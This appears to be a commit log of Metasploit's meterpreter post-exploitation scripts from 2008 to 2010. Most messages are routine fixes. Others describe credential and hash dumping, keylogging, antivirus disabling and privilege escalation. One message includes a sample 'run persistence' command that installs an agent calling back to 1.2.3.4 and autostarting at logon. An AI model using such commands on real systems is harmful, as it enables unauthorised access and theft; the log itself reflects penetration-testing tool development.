git-svn-id: file:///home/svn/framework3/trunk@9123 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-24 14:59:41 +00:00
Carlos Perez 36a88de84a Script for running multiple console commands
git-svn-id: file:///home/svn/framework3/trunk@9122 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-24 14:52:54 +00:00
Carlos Perez 6e8fbe13ed Fixed false positive generated by vmci driver being detected
git-svn-id: file:///home/svn/framework3/trunk@9121 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-24 14:20:42 +00:00
Carlos Perez e438294de9 getgui script now supports Gernam group naming thanks to L0rdAli3n
git-svn-id: file:///home/svn/framework3/trunk@9120 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-24 13:39:55 +00:00
Carlos Perez 53d16c1950 Fixed problem in script multiscript created by changes in revision 8618
git-svn-id: file:///home/svn/framework3/trunk@9119 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-24 13:22:49 +00:00
James Lee ec35fb0312 don't wait on the database when reporting hashes
git-svn-id: file:///home/svn/framework3/trunk@9112 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-20 03:10:48 +00:00
Joshua Drake dbe3453c76 switch use of extensions to client.respond_to
git-svn-id: file:///home/svn/framework3/trunk@9032 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-07 16:03:22 +00:00
Joshua Drake 61b4500ffd remove svn:executable from various files
git-svn-id: file:///home/svn/framework3/trunk@8974 4d416f70-5f16-0410-b530-b9f4589650da
2010-04-01 16:20:34 +00:00
HD Moore 932ffd65c2 Add systeminfo to the list, only works on XP+
git-svn-id: file:///home/svn/framework3/trunk@8964 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-31 04:45:50 +00:00
Joshua Drake e45a29fd4a dont exit on session, show 100% progress line, kill the job in the background after 10 seconds
git-svn-id: file:///home/svn/framework3/trunk@8954 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-29 17:37:58 +00:00
HD Moore 1a53881e3b Add Kurt Grutzmacher's VNC password dumper
git-svn-id: file:///home/svn/framework3/trunk@8913 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-25 03:50:25 +00:00
Joshua Drake b069a43477 handle stopping the handler job in case of failure
git-svn-id: file:///home/svn/framework3/trunk@8912 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-25 01:45:10 +00:00
James Lee 79ac118f47 targ_host -> target_host
git-svn-id: file:///home/svn/framework3/trunk@8910 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-25 01:11:10 +00:00
Joshua Drake 210e241795 use exploit datastore instead of global datastore -- see #394
git-svn-id: file:///home/svn/framework3/trunk@8881 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-22 20:17:18 +00:00
HD Moore b0be430657 Add L4teral's screen unlocker
git-svn-id: file:///home/svn/framework3/trunk@8824 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-15 20:28:10 +00:00
Joshua Drake a811ad0c32 clean up, add comments, and fix bug in command dispatcher, fixes #394
git-svn-id: file:///home/svn/framework3/trunk@8808 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-12 22:59:19 +00:00
Joshua Drake 7b41d08387 remove dupe "-s" option from help, add "-u" option to upgrade command shell session to meterpreter
git-svn-id: file:///home/svn/framework3/trunk@8807 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-12 21:51:55 +00:00
Carlos Perez bbca886cb7 Meterpreter script by Dave Hull for extracting information from Windows lnk files
git-svn-id: file:///home/svn/framework3/trunk@8802 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-12 02:01:15 +00:00
Carlos Perez b0da8cf6d3 Updated script for new methods
git-svn-id: file:///home/svn/framework3/trunk@8736 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-08 03:15:57 +00:00
HD Moore bfe0e013da Allow VNCPORT to be set via -v
git-svn-id: file:///home/svn/framework3/trunk@8735 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-07 23:01:33 +00:00
HD Moore aebedfdb2d Propogate the workspace down to multi-handlers
git-svn-id: file:///home/svn/framework3/trunk@8734 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-07 22:49:08 +00:00
Carlos Perez 5f0e0916f3 Improved Pidging Meterpreter Script by Ryan Hayward
git-svn-id: file:///home/svn/framework3/trunk@8683 4d416f70-5f16-0410-b530-b9f4589650da
2010-03-02 01:54:14 +00:00
James Lee 0bfc8621d5 actually honor the argument to -f
git-svn-id: file:///home/svn/framework3/trunk@8588 4d416f70-5f16-0410-b530-b9f4589650da
2010-02-22 22:23:30 +00:00
HD Moore 7f526940b7 Fix the framework reference
git-svn-id: file:///home/svn/framework3/trunk@8313 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-28 23:18:45 +00:00
Joshua Drake 6f53dad316 add priv escalation meterpreter script for SRT WebDrive bug
git-svn-id: file:///home/svn/framework3/trunk@8301 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-28 19:00:36 +00:00
HD Moore 9548e7837f Wrap the getuid in exception handlers
git-svn-id: file:///home/svn/framework3/trunk@8254 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-27 04:50:43 +00:00
Joshua Drake 5b0cdc2349 change drive as well as directory
this fixes the escalation not working when working directory is not on the same drive as the temp directory


git-svn-id: file:///home/svn/framework3/trunk@8252 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-27 03:29:05 +00:00
HD Moore 13b3c82059 Try a slightly different method of execution, hopefully solve some corner cases
git-svn-id: file:///home/svn/framework3/trunk@8249 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-27 01:00:41 +00:00
Joshua Drake 31949c4343 svn keywords fixups
fixed a bunch of $Id$ and $Revision$ typos
added keywords property to files missing it



git-svn-id: file:///home/svn/framework3/trunk@8242 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-26 20:12:13 +00:00
James Lee 9bca87a611 store results in the database
git-svn-id: file:///home/svn/framework3/trunk@8239 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-26 18:29:01 +00:00
HD Moore e2e681fa2e Minor cosmetic changes
git-svn-id: file:///home/svn/framework3/trunk@8229 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-25 17:07:01 +00:00
HD Moore 322da7dca8 Add a meterpreter script to leverage kitrap0d
git-svn-id: file:///home/svn/framework3/trunk@8228 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-25 17:03:20 +00:00
James Lee aa4e0429ad update to use the new api
git-svn-id: file:///home/svn/framework3/trunk@8208 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-22 23:53:12 +00:00
James Lee fca4d8f3dc fix indentation
git-svn-id: file:///home/svn/framework3/trunk@8207 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-22 23:49:15 +00:00
Joshua Drake 15309ce072 fix example text \\ -> \\\\
git-svn-id: file:///home/svn/framework3/trunk@8187 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-21 17:57:12 +00:00
Carlos Perez 469e1deeb7 Removed useless wireless interface registry key dump
git-svn-id: file:///home/svn/framework3/trunk@8175 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-20 01:41:21 +00:00
Carlos Perez 4e5c0f55bf Bug fix for when running against WindowsXP RTM, and now dumps wireless registry key for 7
git-svn-id: file:///home/svn/framework3/trunk@8172 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-20 01:00:05 +00:00
Carlos Perez 5ed57c6768 Fixed problen whe using AutoScript and sessions -s command
git-svn-id: file:///home/svn/framework3/trunk@8170 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-19 23:52:14 +00:00
Joshua Drake 6293ed89d5 fix variable scope issue
git-svn-id: file:///home/svn/framework3/trunk@8161 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-19 17:03:53 +00:00
Carlos Perez f2e61b9cda All output from enumeration that could be saved in a CSV is now saved in one for easier parsing
git-svn-id: file:///home/svn/framework3/trunk@8143 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-18 01:17:54 +00:00
Carlos Perez f054310e0c Bug fixes, and now all commands output is saved to individual files for easier parsing
git-svn-id: file:///home/svn/framework3/trunk@8142 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-17 19:11:40 +00:00
HD Moore 64c4754ade Add -V to avoid automatic VNC connection
git-svn-id: file:///home/svn/framework3/trunk@8135 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-15 16:17:13 +00:00
Carlos Perez 4f8a3dc95b Meterpreter Script for extracting username, password, server and port of configured services in pidgin client
git-svn-id: file:///home/svn/framework3/trunk@8111 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-14 03:23:47 +00:00
James Lee 0d9e372497 remove more dumb debug prints
git-svn-id: file:///home/svn/framework3/trunk@8110 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-13 23:49:31 +00:00
James Lee 979890f6b3 merge the vnc scripts. 'run vnc -i -t' now does what vnc_oneport used to do
git-svn-id: file:///home/svn/framework3/trunk@8099 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-12 00:39:17 +00:00
James Lee be93b0dbbf merge the vnc scripts. 'run vnc -i -t' now does what vnc_oneport used to do
git-svn-id: file:///home/svn/framework3/trunk@8098 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-12 00:39:00 +00:00
James Lee f0a675e81d merge patch from William Monk to disable courtesy shell. fixes 754
git-svn-id: file:///home/svn/framework3/trunk@8095 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-11 18:15:29 +00:00
HD Moore 1f0380e5ec Handle access errors a little better
git-svn-id: file:///home/svn/framework3/trunk@8054 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-01 19:51:22 +00:00
HD Moore 20932176da Fix a bug that manifests on ruby 1.9.1
git-svn-id: file:///home/svn/framework3/trunk@8053 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-01 16:55:21 +00:00
HD Moore 4512089a34 Registry-based hashdump implementation with syskey decryption. Happy New Years :-)
git-svn-id: file:///home/svn/framework3/trunk@8051 4d416f70-5f16-0410-b530-b9f4589650da
2010-01-01 03:08:17 +00:00
HD Moore aeebec3b7f Fix an issue where %TEMP% contains a space
git-svn-id: file:///home/svn/framework3/trunk@8019 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-29 04:11:58 +00:00
HD Moore 5938d289f5 Fix strip vs strip!
git-svn-id: file:///home/svn/framework3/trunk@8006 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-28 14:49:29 +00:00
HD Moore f000c69e80 Handle the case of incognito returning an empty token list
git-svn-id: file:///home/svn/framework3/trunk@8005 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-28 14:38:25 +00:00
Carlos Perez 2b6a1993aa added portforwading option
git-svn-id: file:///home/svn/framework3/trunk@7969 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-25 15:58:43 +00:00
Carlos Perez 7dcef5359c Added option to port fordward RDP connection
git-svn-id: file:///home/svn/framework3/trunk@7968 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-25 13:38:46 +00:00
Carlos Perez 2af04a5a47 Fixed issues while running against Windows 7 with UAC enabled
git-svn-id: file:///home/svn/framework3/trunk@7967 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-25 05:04:42 +00:00
Carlos Perez ff0c6456cf Multi-threaded execution of shell commands and wmic. Uses hostname instead of IP for when doing client side and targets are behind a NAT device.
git-svn-id: file:///home/svn/framework3/trunk@7909 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-17 18:49:08 +00:00
HD Moore 8b6f452b11 Merges in mubix's VNC script (uses pivoting to keep all comms over the main session). Adds the -f parameter to the migrate command to indicate that a new process should be created always
git-svn-id: file:///home/svn/framework3/trunk@7872 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-15 05:10:33 +00:00
HD Moore 7a5267015e Adds the ability to obtain a VNC desktop through an existing meterpreter session
git-svn-id: file:///home/svn/framework3/trunk@7848 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-14 14:50:26 +00:00
HD Moore 4657436e1d See #609. Force the EXITFUNC to process for persistence.rb's handler
git-svn-id: file:///home/svn/framework3/trunk@7766 4d416f70-5f16-0410-b530-b9f4589650da
2009-12-09 00:18:43 +00:00
James Lee d31aa9094f add usage
git-svn-id: file:///home/svn/framework3/trunk@7363 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-05 00:44:03 +00:00
James Lee 50aa304692 add usage and option parsing
git-svn-id: file:///home/svn/framework3/trunk@7362 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-05 00:40:19 +00:00
James Lee 1afbd3da5f print_status -> print_line in usage
git-svn-id: file:///home/svn/framework3/trunk@7361 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-05 00:38:05 +00:00
James Lee 573b339a08 clean up usage
git-svn-id: file:///home/svn/framework3/trunk@7360 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-05 00:36:04 +00:00
James Lee 8aa3a985da spacing and -h
git-svn-id: file:///home/svn/framework3/trunk@7359 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-05 00:33:37 +00:00
Mario Ceballos 2ef31a70f6 removed the return and use Rex::Script::Completed
git-svn-id: file:///home/svn/framework3/trunk@7354 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-04 17:25:22 +00:00
James Lee 56f18687c5 more hot -h action
git-svn-id: file:///home/svn/framework3/trunk@7351 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-04 16:35:51 +00:00
HD Moore 83e9cf8472 Fixes #456. Matches the new API
git-svn-id: file:///home/svn/framework3/trunk@7337 4d416f70-5f16-0410-b530-b9f4589650da
2009-11-03 19:57:52 +00:00
James Lee 0a6bb91cb9 keywords
git-svn-id: file:///home/svn/framework3/trunk@7276 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 15:14:28 +00:00
James Lee 127b5f8608 keywords, maybe?
git-svn-id: file:///home/svn/framework3/trunk@7275 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 15:12:05 +00:00
Mario Ceballos 3d3e031690 fixes ticket 419
git-svn-id: file:///home/svn/framework3/trunk@7274 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 11:21:23 +00:00
James Lee 232c218475 raise instead of return
git-svn-id: file:///home/svn/framework3/trunk@7273 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 06:02:14 +00:00
James Lee cf25726236 killav usage
git-svn-id: file:///home/svn/framework3/trunk@7272 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 05:50:02 +00:00
James Lee adece18fd5 keylogrecorder usage; spacing; don't try to migrate into the process we're currently running in
git-svn-id: file:///home/svn/framework3/trunk@7271 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 05:26:08 +00:00
James Lee 6e85ba4393 hostedit usage
git-svn-id: file:///home/svn/framework3/trunk@7270 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:56:55 +00:00
James Lee 198bf48735 gettelnet usage and spacing
git-svn-id: file:///home/svn/framework3/trunk@7269 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:49:01 +00:00
James Lee bf48e39532 get_local_subnets usage
git-svn-id: file:///home/svn/framework3/trunk@7268 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:43:59 +00:00
James Lee 0a074b294f getgui option parsing; usage; spacing
git-svn-id: file:///home/svn/framework3/trunk@7267 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:41:51 +00:00
James Lee 1aa9d1b662 fix some spacing; better option parsing; don't write a file if we don't have to
git-svn-id: file:///home/svn/framework3/trunk@7265 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-26 04:33:53 +00:00
HD Moore 6dfaaef295 Remove the bogus puts()
git-svn-id: file:///home/svn/framework3/trunk@7261 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 21:55:59 +00:00
James Lee cadb1c9337 add -h and usage to get_local_subnets
git-svn-id: file:///home/svn/framework3/trunk@7259 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 21:03:42 +00:00
HD Moore b0a38b1cfa Fix bad uses of puts() and add raise Rex::Script::Completed where appropriate. These still need a major overhaul to fix tab indents and other problems
git-svn-id: file:///home/svn/framework3/trunk@7258 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 20:57:23 +00:00
HD Moore f9f690b0e7 Updated prefetch script and creation of Rex::Script::Completed as a clean way to exit meterpreter scripts
git-svn-id: file:///home/svn/framework3/trunk@7257 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 20:50:07 +00:00
James Lee e93995fdab add -h to credcollect
git-svn-id: file:///home/svn/framework3/trunk@7255 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 19:52:40 +00:00
James Lee 5fd8dc748a add -h and usage to checkvm
git-svn-id: file:///home/svn/framework3/trunk@7254 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:53:43 +00:00
James Lee 134c8d75d7 better option handling, beginnings of universal -h support
git-svn-id: file:///home/svn/framework3/trunk@7253 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:36:47 +00:00
James Lee e836e6373a add Id to scripts; remove shebang since they should never run from commandline
git-svn-id: file:///home/svn/framework3/trunk@7252 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 18:04:39 +00:00
James Lee daed2d5d8f spaces --> tabs
git-svn-id: file:///home/svn/framework3/trunk@7251 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:56:01 +00:00
James Lee cdc042d49b keywords
git-svn-id: file:///home/svn/framework3/trunk@7250 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:45:34 +00:00
James Lee 15f8538e1c spaces --> tabs
git-svn-id: file:///home/svn/framework3/trunk@7249 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-25 17:44:53 +00:00
HD Moore 186be3cefe Removing the old name
git-svn-id: file:///home/svn/framework3/trunk@7231 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-23 05:39:11 +00:00
HD Moore 5417926638 Update the prefix script's name
git-svn-id: file:///home/svn/framework3/trunk@7230 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-23 05:38:26 +00:00
HD Moore a6c738a89f Add Milo's prefetch meterpreter script, see http://milo2012.wordpress.com/2009/10/22/meterpreter-script-for-prefetch-tool/
git-svn-id: file:///home/svn/framework3/trunk@7229 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-23 05:25:20 +00:00
HD Moore a3c9c5d669 Fixes a compile error that only flagged on ruby 1.8
git-svn-id: file:///home/svn/framework3/trunk@7219 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-20 22:42:44 +00:00
HD Moore 4b64e01596 Fix the payload name
git-svn-id: file:///home/svn/framework3/trunk@7216 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-20 19:44:53 +00:00
HD Moore fdda743d71 Add the metsvc script
git-svn-id: file:///home/svn/framework3/trunk@7215 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-20 19:36:19 +00:00
Mario Ceballos fa14f1c50c added meterpreter script for CVE-2007-0161 (hp pml driver)
git-svn-id: file:///home/svn/framework3/trunk@7209 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-19 19:05:37 +00:00
HD Moore 15e39e95db Fixes #386. Adds a persistent VBS payload option (keep running the payload in a loop) via the loop-vbs type in msfencode. Adds a 'persistence' script to allow easy persistent meterpeter agent deployment. "run persistence -h" for help. Sample command line:
meterpreter> run persistence -r 1.2.3.4 -p 443 -A -X -i 300

This would install a meterpreter agent that would try to connect to 1.2.3.4:443 once every 300 seconds. This would also start a multi/handler in the background (-A) and make this autorun when any user logs in (-X). In most scenarios, this works just fine:

meterpreter> run persistence -A

This uses your default IP and the default port and immediates handles the next connection, but doesnt install via the registry.



git-svn-id: file:///home/svn/framework3/trunk@7204 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-19 02:42:39 +00:00
Carlos Perez 627f0b7261 Fixed problem when parsing options
git-svn-id: file:///home/svn/framework3/trunk@7152 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-12 23:42:50 +00:00
Carlos Perez e259c04c23 Corrected error, calling undefined method instead of the session
git-svn-id: file:///home/svn/framework3/trunk@7151 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-12 23:34:41 +00:00
kris a9791f2b28 just more typos, etc
git-svn-id: file:///home/svn/framework3/trunk@7140 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-11 17:30:24 +00:00
kris 9e2ebb5a1d just typos
git-svn-id: file:///home/svn/framework3/trunk@7139 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-11 17:09:17 +00:00
kris ea67ed2554 output typo
git-svn-id: file:///home/svn/framework3/trunk@7131 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-06 05:39:05 +00:00
Carlos Perez 45372a6870 Minor change in description of what it is doing
git-svn-id: file:///home/svn/framework3/trunk@7114 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-02 10:51:52 +00:00
Carlos Perez 2176a774ba Forgot to test under Ruby 1.9, made changes specific to string handling and made command array a multiline string
git-svn-id: file:///home/svn/framework3/trunk@7113 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-02 01:10:22 +00:00
Carlos Perez ad0dcfbd12 Fixed issues when running with AutoRunScript and fixed problem with script collection parsing option
git-svn-id: file:///home/svn/framework3/trunk@7112 4d416f70-5f16-0410-b530-b9f4589650da
2009-10-02 00:46:05 +00:00
HD Moore e03d2c84b3 Adds a meterpreter script to trigger the VirtualBox DoS - also an example of running shellcode in another process from the meterpreter api
git-svn-id: file:///home/svn/framework3/trunk@6935 4d416f70-5f16-0410-b530-b9f4589650da
2009-08-02 16:42:54 +00:00
Carlos Perez 263998e27d Added UAC detection for Windows Vista and Windows 7 and checking so as to be able to perform certain accions
git-svn-id: file:///home/svn/framework3/trunk@6904 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-26 17:31:32 +00:00
Carlos Perez 4c2d606183 Updated UAC detection for Windows Vista and Windows 7 Systems allowing to be run under SYSTEM priv
git-svn-id: file:///home/svn/framework3/trunk@6903 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-26 17:09:42 +00:00
Carlos Perez 4559d0e9f3 Script for running a list of other scripts automating the execution of several scripts for post exploitation
git-svn-id: file:///home/svn/framework3/trunk@6893 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-25 02:35:35 +00:00
Carlos Perez b2da01a91a Cleanned up a bit the code and added delete option after upload
git-svn-id: file:///home/svn/framework3/trunk@6892 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-24 23:41:07 +00:00
kris a13a923cba typos
git-svn-id: file:///home/svn/framework3/trunk@6891 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-24 21:22:20 +00:00
Carlos Perez 19f1d59d5d Meterpreter Script for uploading and executing an executable with options
git-svn-id: file:///home/svn/framework3/trunk@6889 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-24 18:26:38 +00:00
Carlos Perez 0ce2d7c6a1 re-wrote checkvm now check in more places, supports Hyper-v, VPC, Vbox, VMware and Xen
git-svn-id: file:///home/svn/framework3/trunk@6879 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-23 03:41:27 +00:00
James Lee 529ded22ae reverting last commit; somebody didn't cross their fingers
git-svn-id: file:///home/svn/framework3/trunk@6847 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-19 20:48:47 +00:00
James Lee c3dc1ecb55 reintegrate browser_autopwn into trunk; cross your fingers and hope this works
git-svn-id: file:///home/svn/framework3/trunk@6846 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-19 17:27:36 +00:00
Carlos Perez cc69ce51cd Fixed problem when script was ran without options
git-svn-id: file:///home/svn/framework3/trunk@6771 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-13 02:13:54 +00:00
Carlos Perez 9f45c6b0fc Packetrecorder script for automating new sniffer module
git-svn-id: file:///home/svn/framework3/trunk@6770 4d416f70-5f16-0410-b530-b9f4589650da
2009-07-13 01:36:08 +00:00
Carlos Perez 22ff946cd2 git-svn-id: file:///home/svn/framework3/trunk@6690 4d416f70-5f16-0410-b530-b9f4589650da 2009-06-20 22:23:12 +00:00
Carlos Perez e4654a7c34 Multi command execution script
git-svn-id: file:///home/svn/framework3/trunk@6689 4d416f70-5f16-0410-b530-b9f4589650da
2009-06-20 22:21:17 +00:00
Carlos Perez e3a2433146 Multi command execution script
git-svn-id: file:///home/svn/framework3/trunk@6685 4d416f70-5f16-0410-b530-b9f4589650da
2009-06-20 17:48:18 +00:00
Carlos Perez 6decdc57b3 Updated for Ruby 1.9.1
git-svn-id: file:///home/svn/framework3/trunk@6684 4d416f70-5f16-0410-b530-b9f4589650da
2009-06-20 17:47:37 +00:00
Carlos Perez 9e28205d16 Updated for Ruby 1.9.1
git-svn-id: file:///home/svn/framework3/trunk@6680 4d416f70-5f16-0410-b530-b9f4589650da
2009-06-20 16:15:46 +00:00
Carlos Perez 5636204767 Updated hostsedit script
git-svn-id: file:///home/svn/framework3/trunk@6658 4d416f70-5f16-0410-b530-b9f4589650da
2009-06-14 19:49:07 +00:00
Carlos Perez 66a7cc1a88 Script for Running the WMIC command tool on the target host.
git-svn-id: file:///home/svn/framework3/trunk@6647 4d416f70-5f16-0410-b530-b9f4589650da
2009-06-14 01:54:35 +00:00
Carlos Perez 3cf9088e1f Script for modifying the hosts file of a target computer
git-svn-id: file:///home/svn/framework3/trunk@6631 4d416f70-5f16-0410-b530-b9f4589650da
2009-06-09 02:50:06 +00:00
HD Moore 7ef884eba7 Updated winenum frmo Carlos Perez
git-svn-id: file:///home/svn/framework3/trunk@6574 4d416f70-5f16-0410-b530-b9f4589650da
2009-05-22 02:33:33 +00:00
HD Moore 9a831f452c Fixed winenum from Carlos
git-svn-id: file:///home/svn/framework3/trunk@6557 4d416f70-5f16-0410-b530-b9f4589650da
2009-05-16 21:24:33 +00:00
HD Moore 37eadc98f5 More scripts from Carlos Perez along with improvements to the existing scripts
git-svn-id: file:///home/svn/framework3/trunk@6556 4d416f70-5f16-0410-b530-b9f4589650da
2009-05-15 04:24:20 +00:00
HD Moore fad673fb35 Correct the execute flags
git-svn-id: file:///home/svn/framework3/trunk@6434 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-29 16:39:47 +00:00
HD Moore 9471a632b6 Adds support for 2007 office types, from Rhys Kidd
git-svn-id: file:///home/svn/framework3/trunk@6433 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-29 16:36:15 +00:00
HD Moore df2df5ca86 Fall back to spawning a new calc.exe process and migratnig there
git-svn-id: file:///home/svn/framework3/trunk@6431 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-29 08:14:47 +00:00
HD Moore f8cef46c90 Adds the credcollect plugin and script from tebo
git-svn-id: file:///home/svn/framework3/trunk@6410 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-28 07:44:44 +00:00
HD Moore e702526dff Fixes up namespace issues in the scraper script
git-svn-id: file:///home/svn/framework3/trunk@6403 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-28 05:52:10 +00:00
natron aae66a4cb3 Per Carlos Perez, WMIC misspells Windows Serverr. Reversing typo corrections.
git-svn-id: file:///home/svn/framework3/trunk@6392 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-25 22:00:36 +00:00
natron 5f5dfbf823 getcountermeasure.rb script from Carlos Perez (detect/disable AV/HIPS/FWs/etc)
git-svn-id: file:///home/svn/framework3/trunk@6390 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-25 15:32:09 +00:00
natron 970d30cd45 Typos in meterpreter scripts (thanks Rhys Kidd)
git-svn-id: file:///home/svn/framework3/trunk@6389 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-25 15:15:56 +00:00
kris f7608fd395 syntactic fix
git-svn-id: file:///home/svn/framework3/trunk@6387 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-25 03:29:45 +00:00
natron 02ab203dfd Updated meterpreter scripts from Carlos Perez
git-svn-id: file:///home/svn/framework3/trunk@6386 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-25 03:13:54 +00:00
HD Moore 73e946ccf1 Bug fixes for typos; dont grabdesktop automatically (breaks psexec apparently)
git-svn-id: file:///home/svn/framework3/trunk@6385 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-25 00:08:42 +00:00
HD Moore 129890d39b Script wrapper around the new keylogger commands from Carlos Perez
git-svn-id: file:///home/svn/framework3/trunk@6384 4d416f70-5f16-0410-b530-b9f4589650da
2009-03-24 03:21:57 +00:00
HD Moore 469378269e Added additional process names submitted by Jerome ATHIAS
git-svn-id: file:///home/svn/framework3/trunk@6204 4d416f70-5f16-0410-b530-b9f4589650da
2009-01-30 06:29:09 +00:00
HD Moore e6ef0ab495 New scripts and updated scripts from Carlos Perez
git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da
2009-01-30 06:18:02 +00:00
kris a1851b19db just typos/misspellings
git-svn-id: file:///home/svn/framework3/trunk@6113 4d416f70-5f16-0410-b530-b9f4589650da
2009-01-11 03:17:21 +00:00
HD Moore 51f01d05a4 Committ a pile of scripts from Carlos Perez, along with the original version of scraper.rb
git-svn-id: file:///home/svn/framework3/trunk@6091 4d416f70-5f16-0410-b530-b9f4589650da
2009-01-08 18:14:03 +00:00
kris 21cb3a5c79 ignore 0.0.0.0
git-svn-id: file:///home/svn/framework3/trunk@5920 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-14 17:12:38 +00:00
kris f4dd47824e fix args checking (back like r5834)
git-svn-id: file:///home/svn/framework3/trunk@5918 4d416f70-5f16-0410-b530-b9f4589650da
2008-11-14 05:18:50 +00:00
James Lee 75feaa6fab allow passing args to meterpreter scripts through AutoRunScript
